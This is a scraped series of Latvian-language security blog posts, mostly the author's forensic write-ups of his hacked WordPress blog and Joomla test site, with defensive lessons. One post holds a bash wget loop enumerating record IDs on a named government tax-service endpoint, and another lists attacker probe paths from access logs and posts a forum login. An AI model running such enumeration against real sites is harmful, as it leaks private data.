http://hakipedia.com/index.php/Cross_Site_Scripting
http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
http://ha.ckers.org/xss.html
http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html

Related posts:

1. www.atlaizuklubs.lv SQL kļūda
2. Uzlauzts Chrysler.lv
3. Hackeri uzbrūk vai gadās arī tā

Related posts:

1. Uzlauzts Chrysler.lv
2. Hackeri uzbrūk vai gadās arī tā
3. Kapitals.lv

Un te seko nākamais pārsteigums- pods izsmiets.

Nu ko vēsture atkārtojas..

Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.

Man pašam arī pāris mēnešus atpakaļ bija nonests wordpress izmantojot wordpress ievainojamību. Kas par iemeslu bija iekš pods.lv būs interesanti noskaidrot un cerams autors neturēs sveci zem pūra. Varbūt nebija atjaunota pēdējā versija, varbūt kaut kas cits.

Iekš LV ik pa laikam kāda lapa tiek nonesta, taču neesmu dzirdējis ne par vienu sekmīgi pabeigtu izmeklēšanu un notiesājošu spriedumu. Gaidu precedentu, lai tīņi urķi nobītos un beigtu bojāt citiem garastāvokli.

Uzstādīts arī interesants redirekts uz www.kuce.lv, kas liek domāt, ka vainīgais mitinās iekš LV

No sava Hackera neaizbēgsi .

Related posts:

1. Boot bīstama lapa vai arī boot ticis izsmiets
2. Second step in forensic investigation vai hackeri uzbrūk 2
3. Hackeri uzbrūk vai gadās arī tā

for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done

Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.

Related posts:

1. No VID EDS tiek nopludināta informācija
2. Hackeri uzbrūk vai gadās arī tā
3. Second step in forensic investigation vai hackeri uzbrūk 2

Cik noprotu lapa ir vienkārši nonesta, līdzīgi kā atgadījās ar mani un daudziem citiem.

Interesanti būtu uzzināt chrysler adminu novērojumus un veidu kā tas tika izdarīts, bet kā parasti par to tiks noklusēts

Ņemot vērā, ka lapa tika atjaunot vismaz rezerves kopija viņiem bija. Par to arī prieks.

Related posts:

1. Kapitals.lv
2. Drošības caurums CSDD un Parex mājaslapā
3. Hackeri uzbrūk vai gadās arī tā

Tēma likās interesanta un izdomāju to mazliet papētīt…

Kas tad bija it kā izdarīts?

1. Hackers it kā piekļuva viņas kontam un publicēja “privātu” foto.

2. Viņa pēc 8 min. to pamanīja un bildi izdzēsa.

Kas šajā stāstā neiet kopā?

1. Pasākums notika pa nakti un diez vai cilvēks var dažu minūšu laikā pamanīt nesankcionēti publicētu info (kaut gan visādi var būt).

2. Apskatot foto Efix izrādās, ka foto ir uzņemts dažas minūtes pirms pirms tā publicēšanas ar BlackBerry 9000.

3. Apskatot bildi var izdarīt secinājumu, ka pati sevi arī ir bildējusi.

Exif properties apskatīju pats- varat pārliecināties par to, apskatot bildes oriģinālu.

Šo pasākumu neatklāju es, bet par to izlasīju te un vēlējos to pārbaudīt.

Kas ir Exif var palasīt te.

Protams saglabājas iespēja, ka hackers pirms bildes publicēšanas ir izmainījis Exif datus, bet tas jau izklausās baigi sarežģīti.

Nelielu ieskatu BlackBerry pasaulē var iegūt Aivara apskatā te.

Gala secinājums.

Šis gadījums vairāk izskatās pēc mārketinga trika, neveiksmīgas kļūdas pievienojot attēlu vai netīšām nosūtot nepareizam adresātam un cenšoties sevi attaisnot piesauca hacker vārdu.

Biju jau piemirsis cik daudz interesantas un noderīgas informācija var sniegt foto

Par twiter hakošanu-

Googlē lielākā pieejamā informācija ir par lietotājvārda un paroles Brute force.

Otrā iespēja ir izmantojot kaut kādu exploitu, kuru man neizdevās atrast vai arī “twiter DNS ievainojamību“, lai publicētu nepatiesu informāciju.

Related posts:

1. Hackeri uzbrūk vai gadās arī tā
2. Second step in forensic investigation vai hackeri uzbrūk 2
3. Kļūda paskaidrojumā vai arī..

Viss sākās ar to, ka atnākot 5dien mājās atvēru pārlūkā savu blogu un tur man priekšā sagaidīja šāda bilde:

No sākuma cerēju, ka tas ir kaut kāds gļuks (naivi ne?) un atvēru administrēšanas paneli, bet tur tiešām kā pēdējais raksts rādījās “Hacked by n2n”.

Jocīgi bija arī tas, ka visi raksti kopš 2009. gada bija ievietoti “Trash”.

Pieņemu, ka nedarbs pastrādāts un brīnumdaris licis mani mierā, lēnā garā mēģinu saprast kas un kā.

Bet, kas tev deva- pēc aptuveni 1. minūtes pienāk epasts no wordpress- admin lietotājam nomainīts epasts un pieprasīta jauna parole.

Skaidrs tagad džekiņš jau mēģina tikt pie wordpress admin konsoles. Neko darīt- jābloķē viņam pieeja

No teorijas- ja vari kontrolēt ko tieši brīnumdaris (hacker) dara tavā lapā, serverī, utt, tas neapdraud draudu konfidencialitāti, integritāti, pieejamību, un ja tas palīdzēs viņu noķert, tad pieeju var riskēt saglabāt.

Ātri ielogojos hostera config panelī un aizliedzu piekļūt visam saturam (izņemot no manas IP).

Darīts- jāsāk skatīties kapēc tas varēja notikt-

Sāku tāpat, kā iepriekšējā rakstā par testa vides problēmām ar webalizer un awstat analīzi.

Skatos references:

pēdējā un svaigākā no pods.lv

Atveru pods.lv- tiešām pie pēdējiem komentāriem “Hacked by n2n”:

Cik sapratu, tas ir plugins, kas attēlo saistītos rakstus un tiklīdz manam rakstam nomainījās nosaukums, tas attēlojās iekš pods.lv.

Viltus trauksme ejam tālāk.

Kas mums ir ar apmeklējumu?

1 apmeklētās apskatījis- 408 lapas un uztaisījis 1507 hitus- uztaisītu noteikti vairāk, ja nepiegrieztu pieeju

Skatāmies, ko viņš ir vēris vaļā:

Tātad ievainojamība bija šajā failā.

Skatāmies vai varam sazīmēt ļauno IP adresi- varam 41.99.45.23. Google piedāvā izsmalcināti info par to.

Atveru wordpres.org un skatos vai nav konstatēta kļūda šinī failā un 2.9.2(pēdējā aktuālā uz to brīdi)- viss kārtībā, kļūda ir bet par to publika vēl nezin

Vairākos forumos (piemēram šinī) ir arī konstatēta šāda problēma, bet pagaidām bez atrisinājuma.

Atveru googli un mēģinu kaut ko sagooglēt.

Martā vienā lapā ir publicēts skaners, kas mēģina exploitēt arī šo failu.

Iespējams, ka pret mani tika pielietots tieši šis Vēlāk biju domājis paeksperimentēt ko viņš tieši dara, kā strādā un kādus rezultātus var iegūt, bet kaut kā vēl līdz šai dienai nav sanācis laiks.

Atšķirībā no iepriekšējā raksta “Hackeri uzbrūk“- šoreiz ir pieejami apache access logs.

Sākumā ar lielu entuziasmu, bet pēc tam ar apnicību gāju tam cauri. Tomēr neko sakarīgu atrast neizdevās.

Visu laiku viens un tas pats-

1) admin-ajax.php failam tiek veikts POST pieprasījums- ļoti žēļ, ka apacis nelogo POST pieprasījumus, tas uzreiz atviegloto manu darbu un dotu skaidru atbildi- ko īsti brīnumdaris tur darīja.

Pats nepārbaudīju, bet uz ātro atradu pamācību, kā iemācīt apacim logot POST datus. Daudzi cepjās- logs augs nejēgā un to visu saglabāt nebūs iespējams, protams, bet ir jau alternatīvas- glabājam īsāku laiku, kopējam uz citurieni, utt. Viss ir atkarīgs vai no šādas info ir jēga- uzlaušanas gadījumā ir.

2) atgriezts rezultāts, pēc tam tiek veikts mistisks GET- cik sapratu atkarībā no POST pieprasījuma rezultāta.

Kas tad beigās tika izdarīts?

• Veidojot mistiskos pieprasījumus http://dll.lv/wp-admin/admin-ajax.php failam brīnumdaris bija izdevies pārvietot lielu daļu rakstu uz trash.
• Viņa posts “Hacked by n2n”, nebija izveidots no jauna, bet vienam rakstam no 2009, gada tika nomainīts saturs un virsraksts.
• Tika izdzēsti visi tagi
• Beigās izdevās nomainīt admin lietotāja epastu un tādā veidā iegūstot admina paroli.

!!!AAA tiko ienāca prātā- vai tikai nebija ievietojis kādā no rakstiem javascript, kas nostrādāja, kad biju ielogojis admin sadaļā un tādā veidā nomainīja admin epasta adresi?

Par labu šai teorijai ir fakts, ka epastu nomainīja apmēram 2. minūtes pēc tam, kad mājās biju ielogojies administrēšanas sadaļā, kaut gan uzbrukums jau bija sācies 1h atpakaļ.

Varbūt sakritība. Bet pārbaudīt man to vairs neizdosies, jo visu iepriekšējo saturu jau esmu izdzēsis.

Secinājumi:

Kārtējo reizi apstiprinās- uzstādod pēdējo “drošo” versiju, neviens nav pasargāts tik un tā.

Uzhakos ne tikai Windows, bet arī ar wordpress..

Backup- tas ir spēks

Manas darbības pēc tam?

Viss kā pēc grāmatas-

Lādējam no wordpres.org wordpress un pluginus no jauna (jo pastāv iespēja, ka esošajā struktūrā ir izveidoti backdoor),

Izveidojam jaunu datubāzi

No rezerves kopijas paceļam pēdējo “drošo” DB versiju (izvēlējos nedēļu pirms uzbrukuma, jo man tā pat pa vidu bija tikai 1 posts.)

Šoreiz nevis vienkārši admin lietotājam uzstādam sarežģītu paroli, bet to izdzēšam.

Uzstādam jaunas paroles.

Meklējam rakstus par wordpress drošību (izrādās viņu ir pa pilno, piemēram šāds) un izpildām to norādījumus

Uzstādam wordpress plugin (http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/), kas palielina drošību.

Uzstādam plugin (http://wordpress.org/extend/plugins/threat-scan-plugin/) , kas pārbauda vai sistēmā nav kaut kas ieperinājies.

Esam nemitīgā stresā

Related posts:

1. Hackeri uzbrūk vai gadās arī tā
2. Nozagtas Facebook lietotāju paroles
3. Drošības caurums CSDD un Parex mājaslapā

do not own a computer;

do not power it on;

and do not use it.” (Robert T. Morris).

Related posts:

1. Aizstājam vai izmainām izvadāmo kodu izmantojot javascript
2. Atbrīvojamies no komentāru spama
3. Lapas redirect

Tā kā esmu jau aizmirsi, kas man tikai nestāv atveru FTP klientu, lai paskatītos direktoriju saturu.

Identificēju trīs izstrādes lapas, kuras jau ir nodotas un tātad tās var dzēst ārā. Tā kā miglaini atceros, kuras tās bija, tad ar lielu interesi ievadu pirmo:

http://dll.lv/test

Un mani sagaida brīnums

Neliels pārsteigums…

Pārējās lapās izmaiņas nav konstatētas un tās tiek izdzēstas

Gribu saprasta kas un kā.

Skatos failu struktūra vietā, bet ir parādījies jauns fails index.html (faila izveidošanas datums 17.03.2010- tāda vairāk kā mēnesi atpakaļ ), lai tas netraucētu gaisu pārsaucu par index.html1.

Skatāmies, kas notiek ar pašu joomla: Izskatās, ka arī datubāzi izdzēsis- atveru phpmyadmin un tiešām:

Paskatos joomla config failu:

Tas atbild uz jautājumu, kāpēc nav izdzēst viss pārējais- katrai testa sistēmai veidoju vienu  datubāzi un vienu lietotāju, kuram pieeja ir tikai konkrētai datubāzei. Izskatās, ka tas mani ir arī paglābis un brīnumdaris nenonesa pilnīgi visu.

Nav miera un gribu paskatīties dziļāk:

• Joomla logs izdzēsts ar visu datubāzi
• Skatos Apache access log-  ieraksti ir pieejami tikai par pēdējo mēnesi, un līdz 17. maijam vairs nesniedzas. Izmainu konfigurāciju, lai turpmāk visus vecos log failus saarhivē un saglabā (iespējams noderēs, bet ceru ka nē ).
• Skatos error_log- arī nekā.

Hosters piedāvā webalizer un awstat:

• No webalizer kādu sakarīgu info izdabūt neizdodas.
• Awstat-

1. no sākuma intresē, kā viņš ir mani uzgājis- pārbaudu meklētājos izmantotos keywords un keyphrases, par februāri un martu, bet nekā aizdomīga neatradu. Sagaidīju atrast kaut ko līdzīgu “joomla include “”", vai ko tamlīdzīgu.
2. Skatos, ko mēs varam sazīmēt saistībā ar IP adresēm- iegūstu IP adrešu sarakstu par martu un februāri, tomēr šis saraksts neuzrāda apmeklējuma dienu, līdz ar to nav īpaši noderīgs, ja vien netaisos pārbaudīt katru IP atsevišķi- ko es noteikti nedarīšu, jo tas ir pārāk laikietilpīgi (bet ja būtu noticis kas nozīmīgs, iespējams, arī būtu sācis pārbaudi).
3. Skatos apmeklētās lapas par februāri un martu- ir apmeklēta tikai http://dll.lv/test/, bet http://dll.lv/test/administrator nav apmeklēta. Dīvaini- jo biju izvirzījis hipotēzi, ka uzlaušana notika, jo administratora parole testa videi bija triviāla, bet ja administrēšanas lapa netika apmeklēta šis pieņēmums neapstiprinās.
4. Meklētās lapas, kuras netika atrastas vai atgrieza kļūdas paziņojumu- nekas interesants saistībā ar testa vidi, bet skatoties atklājās, ka kāds ir meklējis arī ievainojamības pašā blogā. Uz to norāda, piemēram šādi ieraksti:

///administrator/components/com_virtuemart/export.php
/wp-content%20%C2%BB%3Ca%20href=
/guestbook/public/paypal.fr/webscrcmd=_login-run/cgi-bin/login/Confirm.php
/_vti_bin/owssvr.dll
//path/authentication/phpbb3/phpbb3.functions.php
utt.

5. Skatos ārējos refferers un starp tiem aizdomīga ir tikai http://www.sa-hacker.com/vb/showthread.php.

Izskatās, ka esmu kaut ko uzķēris un droši veru lapu vaļā, bet ir aplauziens- viss ir arābu valodā un lai arī kaut ko redzētu ir nepieciešams reģistrēties. Reģistrācijai palīdz google tulkotājs, jo no tiem ķeburiem neko saprast nevar (ja kādam ir intrese par turieni paložņāt- user: zumzum, pass:zumzumzum, email:zumzum@spam.la). Izmeklējos par forumu, bet tomēr neko sakarīgu neatradu.

Kāds tad ir sausais atlikums?

Pēc analīzes secinu, ka ir izdzēsta datubāze, izveidots viens jauns fails, bet pārējā failu struktūra nav mainīta vai dzēsta.

Diemžēl nesanāca atklāt kādā veidā šis brīnums tika pastrādāts un līdz ar to neko prātīgu ieteikt neizdodas (iespējams bija novecojusi un bug -aina joomla vai tās komponente (tas gan mazticams, jo webalizer neuzrādīja apmeklētas kādas lapas, piemēram: dll.lv/test/component/crack.php?upload…) versija).

No šiem meistariem neesam pasargāti, bet, lai mazinātu to ietekmi:

• taisām backup
• katrai sistēmai izdalām savu DB un atsevišķu lietotāju, kuram nav piekļuve citām datubāzēm.
• saglabājam auditācijas pierakstus ilgāk..
• vienmēr uzstādam pēdējos drošības ielāpus
• ja ir iespēja uzstādīt papildus perimetra aizsardzību, piemēram, revers proxy
• ja gadījies kāds incidents, tad to iespēju robežās izmeklējam un izdarām secinājumus, nevis ignorējam un ceram, ka tas neatkārtosies.

PS.
Tagad laikam ir īstais brīdis pateikt ko es domāju par šiem brīnumdariem- neko labu.

Manās acīs tie ir visādi mūdži, kuri nodarbojas tikai ar savu ģenitāliju staipīšanu.
Cita lieta ir drošības speciālisti, kuri atklāj, konsultē un palīdz novērst (par naudu- protams) drošības ievainojamības vai ari hackeri, kuri iegūto informāciju izmanto ekonomisku labumu gūšanai, piemēram, izpirkuma maksas pieprasīšanai vai citas informācijas iegūšanai, ar kuru pēc tam operējot var uztaisīt skanošo- piemēram, kā ukraiņu hakers.

Bet vienkārši atrast lapu ar konkrētu ievainojamību, to izdzēst, nemaz neiedziļinoties kam tā pieder un kam tā kalpo?? Tas, manuprāt, ir zem jebkāda goda, kaut palasot pievienotās rindiņas index failam- šim cilvēkam no Palestīnas tāda nemaz nav bijis kopš dzimšanas:

I aM: A FrEe PaLeStIn!aN’s HaCK3eR

I DoN’t ApPeAr InTelLeGaNcE, BuT I AiM To DeStRoY InTeLlEgAnT

DoN’t ChAlLeNg A PeRsOn WhO HaS N0N To LoSe

PlAyInG WiTh Ch!LdReN DoSeN’t EnTeRtA!N Me

AdM!n DoN’t CrY….. CrY!Ng Is N0T A MaN’s ShArM

Related posts:

1. Nozagtas Facebook lietotāju paroles
2. Drošības caurums CSDD un Parex mājaslapā
3. Google (i) nozagts Gaia izejas kods :)

Related posts:

1. Nozagtas Facebook lietotāju paroles
2. Google (i) nozagts Gaia izejas kods :)
3. Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums